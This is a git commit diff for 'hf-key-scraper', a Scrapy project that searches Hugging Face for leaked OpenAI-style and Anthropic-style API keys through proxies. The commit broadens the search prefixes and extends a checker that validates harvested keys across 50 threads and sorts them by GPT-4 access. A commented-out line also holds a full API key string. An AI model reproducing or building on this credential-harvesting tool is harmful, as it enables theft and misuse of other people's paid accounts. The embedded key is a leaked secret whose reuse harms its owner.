final commit
This commit is contained in:
parent
15759586e4
commit
c13c224b36
|
@ -1,4 +1,6 @@
|
|||
.idea
|
||||
found-keys*.txt
|
||||
|
||||
|
||||
# ---> Python
|
||||
# Byte-compiled / optimized / DLL files
|
||||
|
|
|
@ -1,3 +1,5 @@
|
|||
# hf-key-scraper
|
||||
|
||||
Scrape for OpenAI keys on Hugging Face
|
||||
Scrape for OpenAI keys on Hugging Face.
|
||||
|
||||
This requires at least one Squid proxy to function. Define your proxies in the `PROXIES` list in `settings.py`.
|
||||
|
|
|
@ -1,8 +1,9 @@
|
|||
import argparse
|
||||
import concurrent
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from pathlib import Path
|
||||
|
||||
from tqdm import tqdm
|
||||
|
||||
from keychecker.check import check_key
|
||||
|
||||
|
||||
|
@ -17,26 +18,29 @@ def process_key(key):
|
|||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description='Scrape data from chub.ai.')
|
||||
parser.add_argument('input_file', help='Path to the file containing the keys.')
|
||||
parser.add_argument('input_file', nargs='*', help='Path to the file containing the keys.')
|
||||
args = parser.parse_args()
|
||||
|
||||
input_file = Path(args.input_file).resolve().absolute()
|
||||
|
||||
keys = set()
|
||||
for file in args.input_file:
|
||||
input_file = Path(file).resolve().expanduser().absolute()
|
||||
if not input_file.exists():
|
||||
print('Input file does not exist:', input_file)
|
||||
quit(1)
|
||||
|
||||
with open(input_file) as f:
|
||||
content = set(f.read().splitlines())
|
||||
data = set(input_file.read_text().splitlines())
|
||||
keys = keys | data
|
||||
|
||||
# content = ['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']
|
||||
|
||||
print('Checking', len(keys), 'keys...')
|
||||
|
||||
gpt_4 = set()
|
||||
gpt_4_32k = set()
|
||||
gpt_3 = set()
|
||||
pbar = tqdm(total=len(keys))
|
||||
|
||||
with ThreadPoolExecutor(max_workers=50) as executor:
|
||||
results = executor.map(process_key, content)
|
||||
results = executor.map(process_key, keys)
|
||||
for result in results:
|
||||
if result is not None:
|
||||
if result['has_gpt_4']:
|
||||
|
@ -45,6 +49,8 @@ def main():
|
|||
gpt_4_32k.add(result['api_key'])
|
||||
if result['has_only_turbo']:
|
||||
gpt_3.add(result['api_key'])
|
||||
pbar.update(1)
|
||||
pbar.close()
|
||||
print('')
|
||||
|
||||
print('GPT4 KEYS:')
|
||||
|
|
|
@ -92,10 +92,7 @@ TWISTED_REACTOR = "twisted.internet.asyncioreactor.AsyncioSelectorReactor"
|
|||
FEED_EXPORT_ENCODING = "utf-8"
|
||||
|
||||
PROXIES = [
|
||||
"http://172.0.4.7:3128",
|
||||
"http://172.0.4.8:3128",
|
||||
"http://172.0.4.10:3128",
|
||||
"http://172.0.4.12:3128",
|
||||
"http://127.0.0.1:3128"
|
||||
]
|
||||
|
||||
LOG_LEVEL = 'CRITICAL'
|
||||
|
|
|
@ -31,5 +31,5 @@ class HuggingfaceSpider(CrawlSpider):
|
|||
text = response.text
|
||||
matches = self.regex.findall(text)
|
||||
if matches:
|
||||
self.logger.error(f"{matches}")
|
||||
self.logger.debug(f"{matches}")
|
||||
return FoundItem(url=response.url, matches=matches)
|
||||
|
|
|
@ -4,14 +4,14 @@ import time
|
|||
|
||||
import coloredlogs
|
||||
import scrapy
|
||||
|
||||
from string import ascii_lowercase, ascii_uppercase
|
||||
from ..pipelines import FoundItem
|
||||
|
||||
|
||||
class HFSearchSpider(scrapy.Spider):
|
||||
name = "huggingface_search"
|
||||
allowed_domains = ["huggingface.co"]
|
||||
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in ['a', 'h', 'm', 'q'] for j in range(10)]
|
||||
start_urls = ['https://huggingface.co/search/full-text?q=sk-{}&limit=100&skip={}'.format(i, j * 100) for i in [*ascii_lowercase, *ascii_uppercase, *range(10), 'etk', 'ant'] for j in range(10)]
|
||||
logger = logging.getLogger('HFSearchSpider')
|
||||
logger.setLevel(logging.DEBUG)
|
||||
coloredlogs.install(logger=logger, level=logging.DEBUG)
|
||||
|
@ -27,5 +27,5 @@ class HFSearchSpider(scrapy.Spider):
|
|||
for key in keys:
|
||||
found_keys.add(''.join(key))
|
||||
if len(found_keys):
|
||||
self.logger.error(f"{found_keys}")
|
||||
self.logger.debug(f"{found_keys}")
|
||||
yield FoundItem(url=response.url, matches=found_keys)
|
||||
|
|
Reference in New Issue